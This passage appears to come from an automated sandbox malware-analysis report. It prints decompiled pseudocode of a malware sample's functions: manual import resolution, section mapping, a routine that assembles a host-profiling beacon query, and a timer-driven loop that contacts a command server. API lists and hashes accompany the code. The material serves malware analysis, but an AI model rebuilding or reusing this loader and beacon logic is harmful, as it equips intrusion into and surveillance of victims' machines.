                                                                                                                                  				_Unknown_base(*)()* _t53;
                                                                                                                                  				CHAR* _t54;
                                                                                                                                  				_Unknown_base(*)()* _t55;
                                                                                                                                  				void* _t58;
                                                                                                                                  				signed int _t59;
                                                                                                                                  				_Unknown_base(*)()* _t60;
                                                                                                                                  				intOrPtr _t61;
                                                                                                                                  				intOrPtr _t65;
                                                                                                                                  				signed int _t68;
                                                                                                                                  				void* _t69;
                                                                                                                                  				CHAR* _t71;
                                                                                                                                  				signed short* _t73;
                                                                                                                                  
                                                                                                                                  				_t69 = __edi;
                                                                                                                                  				_v20 = _v20 & 0x00000000;
                                                                                                                                  				_t59 =  *0x6e8d41c0;
                                                                                                                                  				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                                                                                                  				if(_t43 != 0) {
                                                                                                                                  					_t45 = _t43 + __edi;
                                                                                                                                  					_v12 = _t45;
                                                                                                                                  					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                  					if(_t46 != 0) {
                                                                                                                                  						while(1) {
                                                                                                                                  							_t71 = _t46 + _t69;
                                                                                                                                  							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                  							_v28 = _t47;
                                                                                                                                  							if(_t47 == 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							_v24 = _v24 & 0x00000000;
                                                                                                                                  							 *_t71 = _t59 - 0x69b25f44;
                                                                                                                                  							_t49 = _v12;
                                                                                                                                  							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                  							_t50 =  *_t49;
                                                                                                                                  							if(_t50 != 0) {
                                                                                                                                  								L6:
                                                                                                                                  								_t73 = _t50 + _t69;
                                                                                                                                  								_v16 = _t61 + _t69;
                                                                                                                                  								while(1) {
                                                                                                                                  									_t51 =  *_t73;
                                                                                                                                  									if(_t51 == 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									if(__eflags < 0) {
                                                                                                                                  										__eflags = _t51 - _t69;
                                                                                                                                  										if(_t51 < _t69) {
                                                                                                                                  											L12:
                                                                                                                                  											_t21 =  &_v8;
                                                                                                                                  											 *_t21 = _v8 & 0x00000000;
                                                                                                                                  											__eflags =  *_t21;
                                                                                                                                  											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                  										} else {
                                                                                                                                  											_t65 = _a4;
                                                                                                                                  											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                  											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                  												goto L12;
                                                                                                                                  											} else {
                                                                                                                                  												goto L11;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										_t51 = _t51 + _t69;
                                                                                                                                  										L11:
                                                                                                                                  										_v8 = _t51;
                                                                                                                                  									}
                                                                                                                                  									_t53 = _v8;
                                                                                                                                  									__eflags = _t53;
                                                                                                                                  									if(_t53 == 0) {
                                                                                                                                  										_t54 = _v24 & 0x0000ffff;
                                                                                                                                  									} else {
                                                                                                                                  										_t54 = _t53 + 2;
                                                                                                                                  									}
                                                                                                                                  									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                  									__eflags = _t55;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										_v20 = _t59 - 0x69b25ec5;
                                                                                                                                  									} else {
                                                                                                                                  										_t68 = _v8;
                                                                                                                                  										__eflags = _t68;
                                                                                                                                  										if(_t68 != 0) {
                                                                                                                                  											 *_t68 = _t59 - 0x69b25f44;
                                                                                                                                  										}
                                                                                                                                  										 *_v16 = _t55;
                                                                                                                                  										_t58 = 0x593682f4 + _t59 * 4;
                                                                                                                                  										_t73 = _t73 + _t58;
                                                                                                                                  										_t32 =  &_v16;
                                                                                                                                  										 *_t32 = _v16 + _t58;
                                                                                                                                  										__eflags =  *_t32;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  									goto L23;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t50 = _t61;
                                                                                                                                  								if(_t61 != 0) {
                                                                                                                                  									goto L6;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L23:
                                                                                                                                  							_v12 = _v12 + 0x14;
                                                                                                                                  							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  							}
                                                                                                                                  							L26:
                                                                                                                                  							goto L27;
                                                                                                                                  						}
                                                                                                                                  						_t60 = _t59 + 0x964da13a;
                                                                                                                                  						__eflags = _t60;
                                                                                                                                  						_v20 = _t60;
                                                                                                                                  						goto L26;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				L27:
                                                                                                                                  				return _v20;
                                                                                                                                  			}




























                                                                                                                                  0x6e8d1e82
                                                                                                                                  0x6e8d1e82
                                                                                                                                  0x6e8d1e8f
                                                                                                                                  0x6e8d1e95
                                                                                                                                  0x6e8d1e97
                                                                                                                                  0x6e8d1ec7
                                                                                                                                  0x6e8d1e99
                                                                                                                                  0x6e8d1e99
                                                                                                                                  0x6e8d1e9c
                                                                                                                                  0x6e8d1e9e
                                                                                                                                  0x6e8d1ea6
                                                                                                                                  0x6e8d1ea6
                                                                                                                                  0x6e8d1eab
                                                                                                                                  0x6e8d1ead
                                                                                                                                  0x6e8d1eb4
                                                                                                                                  0x6e8d1eb6
                                                                                                                                  0x6e8d1eb6
                                                                                                                                  0x6e8d1eb6
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1eb6
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1e97
                                                                                                                                  0x6e8d1e46
                                                                                                                                  0x6e8d1e46
                                                                                                                                  0x6e8d1e4a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1e4a
                                                                                                                                  0x6e8d1eca
                                                                                                                                  0x6e8d1eca
                                                                                                                                  0x6e8d1ed1
                                                                                                                                  0x6e8d1ed6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1edc
                                                                                                                                  0x6e8d1ee7
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1ee7
                                                                                                                                  0x6e8d1ede
                                                                                                                                  0x6e8d1ede
                                                                                                                                  0x6e8d1ee4
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1ee4
                                                                                                                                  0x6e8d1e12
                                                                                                                                  0x6e8d1ee8
                                                                                                                                  0x6e8d1eed

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E8D1E1D
                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 6E8D1E8F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                  • Opcode ID: c05c3bcfc00b571293a5b4bd135c08ce172492a101b51d22a3505280b25eaf15
                                                                                                                                  • Instruction ID: 08456b38ea66de3be4953aba8b02c5d180792135f7d7dabfe2330cb1a50ca75e
                                                                                                                                  • Opcode Fuzzy Hash: c05c3bcfc00b571293a5b4bd135c08ce172492a101b51d22a3505280b25eaf15
                                                                                                                                  • Instruction Fuzzy Hash: 7F313AB5A0060ADFDB44CF99C890AADB7F9FF45310F104869D811EB240E730EA49CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E6E8D1273(void** __esi, PVOID* _a4) {
                                                                                                                                  				long _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				long _t13;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                                                                  				if(_t13 < 0) {
                                                                                                                                  					_push(_t13);
                                                                                                                                  					return __esi[6]();
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}








                                                                                                                                  APIs
                                                                                                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,6E8D142A,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6E8D142A,?), ref: 6E8D12A0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SectionView
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1323581903-0
                                                                                                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                  • Instruction ID: 70924ee3e64d5e86eef3f1d7b2d619ade16b276e5972e05c6a971949feda0d4e
                                                                                                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                  • Instruction Fuzzy Hash: BBF01CB690420CBFEB119FA9CC85C9FBBBDEB44394B104E39B152E1090D631AE4C8A60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                  			E00A344A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                                  				intOrPtr _v0;
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void* _v44;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				void* __edi;
                                                                                                                                  				long _t25;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr _t27;
                                                                                                                                  				intOrPtr _t28;
                                                                                                                                  				intOrPtr _t29;
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				void* _t33;
                                                                                                                                  				intOrPtr _t34;
                                                                                                                                  				int _t37;
                                                                                                                                  				void* _t38;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				void* _t46;
                                                                                                                                  				intOrPtr _t50;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                  				intOrPtr _t62;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				intOrPtr _t71;
                                                                                                                                  				intOrPtr _t74;
                                                                                                                                  				int _t77;
                                                                                                                                  				intOrPtr _t78;
                                                                                                                                  				int _t81;
                                                                                                                                  				intOrPtr _t83;
                                                                                                                                  				int _t86;
                                                                                                                                  				intOrPtr* _t89;
                                                                                                                                  				intOrPtr* _t90;
                                                                                                                                  				void* _t91;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t97;
                                                                                                                                  				intOrPtr _t98;
                                                                                                                                  				void* _t100;
                                                                                                                                  				int _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  				void* _t103;
                                                                                                                                  				void* _t105;
                                                                                                                                  				void* _t106;
                                                                                                                                  				void* _t108;
                                                                                                                                  
                                                                                                                                  				_t95 = __edx;
                                                                                                                                  				_t91 = __ecx;
                                                                                                                                  				_t25 = __eax;
                                                                                                                                  				_t105 = _a16;
                                                                                                                                  				_v4 = 8;
                                                                                                                                  				if(__eax == 0) {
                                                                                                                                  					_t25 = GetTickCount();
                                                                                                                                  				}
                                                                                                                                  				_t26 =  *0xa3d018; // 0x53709a90
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t27 =  *0xa3d014; // 0x3a87c8cd
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t28 =  *0xa3d010; // 0xd8d2f808
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t29 =  *0xa3d00c; // 0xeec43f25
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t30 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t3 = _t30 + 0xa3e633; // 0x74666f73
                                                                                                                                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0xa3d02c,  *0xa3d004, _t25);
                                                                                                                                  				_t33 = E00A35B60();
                                                                                                                                  				_t34 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t4 = _t34 + 0xa3e673; // 0x74707526
                                                                                                                                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                                  				_t108 = _t106 + 0x38;
                                                                                                                                  				_t102 = _t101 + _t37; // executed
                                                                                                                                  				_t38 = E00A31BBF(_t91); // executed
                                                                                                                                  				_t96 = _t38;
                                                                                                                                  				if(_t96 != 0) {
                                                                                                                                  					_t83 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t6 = _t83 + 0xa3e8cc; // 0x736e6426
                                                                                                                                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                                  					_t108 = _t108 + 0xc;
                                                                                                                                  					_t102 = _t102 + _t86;
                                                                                                                                  					HeapFree( *0xa3d270, 0, _t96);
                                                                                                                                  				}
                                                                                                                                  				_t97 = E00A3137A();
                                                                                                                                  				if(_t97 != 0) {
                                                                                                                                  					_t78 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t8 = _t78 + 0xa3e8d4; // 0x6f687726
                                                                                                                                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                                  					_t108 = _t108 + 0xc;
                                                                                                                                  					_t102 = _t102 + _t81;
                                                                                                                                  					HeapFree( *0xa3d270, 0, _t97);
                                                                                                                                  				}
                                                                                                                                  				_t98 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  				_a32 = E00A33857(0xa3d00a, _t98 + 4);
                                                                                                                                  				_t42 =  *0xa3d308; // 0x0
                                                                                                                                  				if(_t42 != 0) {
                                                                                                                                  					_t74 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t11 = _t74 + 0xa3e8ae; // 0x3d736f26
                                                                                                                                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                                  					_t108 = _t108 + 0xc;
                                                                                                                                  					_t102 = _t102 + _t77;
                                                                                                                                  				}
                                                                                                                                  				_t43 =  *0xa3d304; // 0x0
                                                                                                                                  				if(_t43 != 0) {
                                                                                                                                  					_t71 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t13 = _t71 + 0xa3e885; // 0x3d706926
                                                                                                                                  					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                                  				}
                                                                                                                                  				if(_a32 != 0) {
                                                                                                                                  					_t46 = RtlAllocateHeap( *0xa3d270, 0, 0x800); // executed
                                                                                                                                  					_t100 = _t46;
                                                                                                                                  					if(_t100 != 0) {
                                                                                                                                  						E00A3A811(GetTickCount());
                                                                                                                                  						_t50 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  						__imp__(_t50 + 0x40);
                                                                                                                                  						asm("lock xadd [eax], ecx");
                                                                                                                                  						_t54 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  						__imp__(_t54 + 0x40);
                                                                                                                                  						_t56 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  						_t103 = E00A31974(1, _t95, _t105,  *_t56);
                                                                                                                                  						asm("lock xadd [eax], ecx");
                                                                                                                                  						if(_t103 != 0) {
                                                                                                                                  							StrTrimA(_t103, 0xa3c2ac);
                                                                                                                                  							_push(_t103);
                                                                                                                                  							_t62 = E00A338CA();
                                                                                                                                  							_v16 = _t62;
                                                                                                                                  							if(_t62 != 0) {
                                                                                                                                  								_t89 = __imp__;
                                                                                                                                  								 *_t89(_t103, _v0);
                                                                                                                                  								 *_t89(_t100, _a4);
                                                                                                                                  								_t90 = __imp__;
                                                                                                                                  								 *_t90(_t100, _v28);
                                                                                                                                  								 *_t90(_t100, _t103);
                                                                                                                                  								_t68 = E00A32A4E(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                                                                                                                  								_v52 = _t68;
                                                                                                                                  								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                                  									E00A347D5();
                                                                                                                                  								}
                                                                                                                                  								HeapFree( *0xa3d270, 0, _v44);
                                                                                                                                  							}
                                                                                                                                  							HeapFree( *0xa3d270, 0, _t103);
                                                                                                                                  						}
                                                                                                                                  						RtlFreeHeap( *0xa3d270, 0, _t100); // executed
                                                                                                                                  					}
                                                                                                                                  					HeapFree( *0xa3d270, 0, _a24);
                                                                                                                                  				}
                                                                                                                                  				RtlFreeHeap( *0xa3d270, 0, _t105); // executed
                                                                                                                                  				return _a4;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A344BB
                                                                                                                                  • wsprintfA.USER32 ref: 00A34508
                                                                                                                                  • wsprintfA.USER32 ref: 00A34525
                                                                                                                                  • wsprintfA.USER32 ref: 00A34548
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A34558
                                                                                                                                  • wsprintfA.USER32 ref: 00A3457A
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A3458A
                                                                                                                                  • wsprintfA.USER32 ref: 00A345C1
                                                                                                                                  • wsprintfA.USER32 ref: 00A345E1
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A345FE
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A3460E
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(033A9570), ref: 00A34622
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(033A9570), ref: 00A34640
                                                                                                                                    • Part of subcall function 00A31974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00A34653,?,033A95B0), ref: 00A3199F
                                                                                                                                    • Part of subcall function 00A31974: lstrlen.KERNEL32(?,?,?,00A34653,?,033A95B0), ref: 00A319A7
                                                                                                                                    • Part of subcall function 00A31974: strcpy.NTDLL ref: 00A319BE
                                                                                                                                    • Part of subcall function 00A31974: lstrcat.KERNEL32(00000000,?), ref: 00A319C9
                                                                                                                                    • Part of subcall function 00A31974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A34653,?,033A95B0), ref: 00A319E6
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,00A3C2AC,?,033A95B0), ref: 00A34672
                                                                                                                                    • Part of subcall function 00A338CA: lstrlen.KERNEL32(033A9B10,00000000,00000000,7691C740,00A3467E,00000000), ref: 00A338DA
                                                                                                                                    • Part of subcall function 00A338CA: lstrlen.KERNEL32(?), ref: 00A338E2
                                                                                                                                    • Part of subcall function 00A338CA: lstrcpy.KERNEL32(00000000,033A9B10), ref: 00A338F6
                                                                                                                                    • Part of subcall function 00A338CA: lstrcat.KERNEL32(00000000,?), ref: 00A33901
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00A34691
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00A34698
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00A346A5
                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A346A9
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00A346D9
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A346E8
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,033A95B0), ref: 00A346F7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A34709
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 00A34718
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3963266935-8415677
                                                                                                                                  • Opcode ID: af24eea4083ade2fc179135c9e50b423b2eaddbb591301222084f31320140a73
                                                                                                                                  • Instruction ID: ff65ec6cb014dbd931d93bea42b486d0ff242564e77c1cbb022d482e94471505
                                                                                                                                  • Opcode Fuzzy Hash: af24eea4083ade2fc179135c9e50b423b2eaddbb591301222084f31320140a73
                                                                                                                                  • Instruction Fuzzy Hash: 71619B71900200EFD721EBE8ED89F977BA8FB49750F040418F949D7261DB35E9178B65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E00A35461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				struct %anon52 _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				union _LARGE_INTEGER _v36;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				void* _v44;
                                                                                                                                  				void _v88;
                                                                                                                                  				char _v92;
                                                                                                                                  				struct %anon52 _t46;
                                                                                                                                  				intOrPtr _t51;
                                                                                                                                  				long _t53;
                                                                                                                                  				void* _t54;
                                                                                                                                  				struct %anon52 _t60;
                                                                                                                                  				long _t64;
                                                                                                                                  				signed int _t65;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t70;
                                                                                                                                  				signed int _t71;
                                                                                                                                  				intOrPtr _t73;
                                                                                                                                  				intOrPtr _t76;
                                                                                                                                  				void** _t78;
                                                                                                                                  				void* _t80;
                                                                                                                                  
                                                                                                                                  				_t73 = __edx;
                                                                                                                                  				_v92 = 0;
                                                                                                                                  				memset( &_v88, 0, 0x2c);
                                                                                                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                  				_v44 = _t46;
                                                                                                                                  				if(_t46 == 0) {
                                                                                                                                  					_v8.LowPart = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					_push(0xffffffff);
                                                                                                                                  					_push(0xff676980);
                                                                                                                                  					_push(0);
                                                                                                                                  					_push( *0xa3d278);
                                                                                                                                  					_v20 = 0;
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					L00A3AED0();
                                                                                                                                  					_v36.LowPart = _t46;
                                                                                                                                  					_v32 = _t73;
                                                                                                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                  					_t51 =  *0xa3d2a4; // 0x208
                                                                                                                                  					_v40 = _t51;
                                                                                                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                  					_v8.LowPart = _t53;
                                                                                                                                  					if(_t53 == 0) {
                                                                                                                                  						if(_a8 != 0) {
                                                                                                                                  							L4:
                                                                                                                                  							 *0xa3d284 = 5;
                                                                                                                                  						} else {
                                                                                                                                  							_t68 = E00A3502E(_t73); // executed
                                                                                                                                  							if(_t68 != 0) {
                                                                                                                                  								goto L4;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_v12 = 0;
                                                                                                                                  						L6:
                                                                                                                                  						L6:
                                                                                                                                  						if(_v12 == 1 && ( *0xa3d298 & 0x00000001) == 0) {
                                                                                                                                  							_v12 = 2;
                                                                                                                                  						}
                                                                                                                                  						_t71 = _v12;
                                                                                                                                  						_t58 = _t71 << 4;
                                                                                                                                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                  						_t72 = _t71 + 1;
                                                                                                                                  						_v24 = _t71 + 1;
                                                                                                                                  						_t60 = E00A3577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                                                                                                  						_v8.LowPart = _t60;
                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                  							goto L17;
                                                                                                                                  						}
                                                                                                                                  						_t65 = _v24;
                                                                                                                                  						_v12 = _t65;
                                                                                                                                  						_t90 = _t65 - 3;
                                                                                                                                  						if(_t65 != 3) {
                                                                                                                                  							goto L6;
                                                                                                                                  						} else {
                                                                                                                                  							_v8.LowPart = E00A32107(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                  						}
                                                                                                                                  						goto L12;
                                                                                                                                  						L17:
                                                                                                                                  						__eflags = _t60 - 0x10d2;
                                                                                                                                  						if(_t60 != 0x10d2) {
                                                                                                                                  							_push(0xffffffff);
                                                                                                                                  							_push(0xff676980);
                                                                                                                                  							_push(0);
                                                                                                                                  							_push( *0xa3d27c);
                                                                                                                                  							goto L21;
                                                                                                                                  						} else {
                                                                                                                                  							__eflags =  *0xa3d280; // 0x0
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								goto L12;
                                                                                                                                  							} else {
                                                                                                                                  								_t60 = E00A347D5();
                                                                                                                                  								_push(0xffffffff);
                                                                                                                                  								_push(0xdc3cba00);
                                                                                                                                  								_push(0);
                                                                                                                                  								_push( *0xa3d280);
                                                                                                                                  								L21:
                                                                                                                                  								L00A3AED0();
                                                                                                                                  								_v36.LowPart = _t60;
                                                                                                                                  								_v32 = _t76;
                                                                                                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                  								_v8.LowPart = _t64;
                                                                                                                                  								__eflags = _t64;
                                                                                                                                  								if(_t64 == 0) {
                                                                                                                                  									goto L6;
                                                                                                                                  								} else {
                                                                                                                                  									goto L12;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L25:
                                                                                                                                  					}
                                                                                                                                  					L12:
                                                                                                                                  					_t78 =  &_v92;
                                                                                                                                  					_t70 = 3;
                                                                                                                                  					do {
                                                                                                                                  						_t54 =  *_t78;
                                                                                                                                  						if(_t54 != 0) {
                                                                                                                                  							HeapFree( *0xa3d270, 0, _t54);
                                                                                                                                  						}
                                                                                                                                  						_t78 =  &(_t78[4]);
                                                                                                                                  						_t70 = _t70 - 1;
                                                                                                                                  					} while (_t70 != 0);
                                                                                                                                  					CloseHandle(_v44);
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  				goto L25;
                                                                                                                                  			}




























                                                                                                                                  0x00a355ce
                                                                                                                                  0x00a355d1
                                                                                                                                  0x00a355dc
                                                                                                                                  0x00a355de
                                                                                                                                  0x00a355e1
                                                                                                                                  0x00a355e3
                                                                                                                                  0x00000000
                                                                                                                                  0x00a355e9
                                                                                                                                  0x00000000
                                                                                                                                  0x00a355e9
                                                                                                                                  0x00a355e3
                                                                                                                                  0x00a35596
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3558e
                                                                                                                                  0x00a3555e
                                                                                                                                  0x00a35560
                                                                                                                                  0x00a35563
                                                                                                                                  0x00a35564
                                                                                                                                  0x00a35564
                                                                                                                                  0x00a35568
                                                                                                                                  0x00a35572
                                                                                                                                  0x00a35572
                                                                                                                                  0x00a35578
                                                                                                                                  0x00a3557b
                                                                                                                                  0x00a3557b
                                                                                                                                  0x00a35581
                                                                                                                                  0x00a35581
                                                                                                                                  0x00a355fe
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • memset.NTDLL ref: 00A35476
                                                                                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00A35482
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00A354A7
                                                                                                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00A354C3
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A354DC
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A35572
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00A35581
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00A355BB
                                                                                                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00A353C9,?), ref: 00A355D1
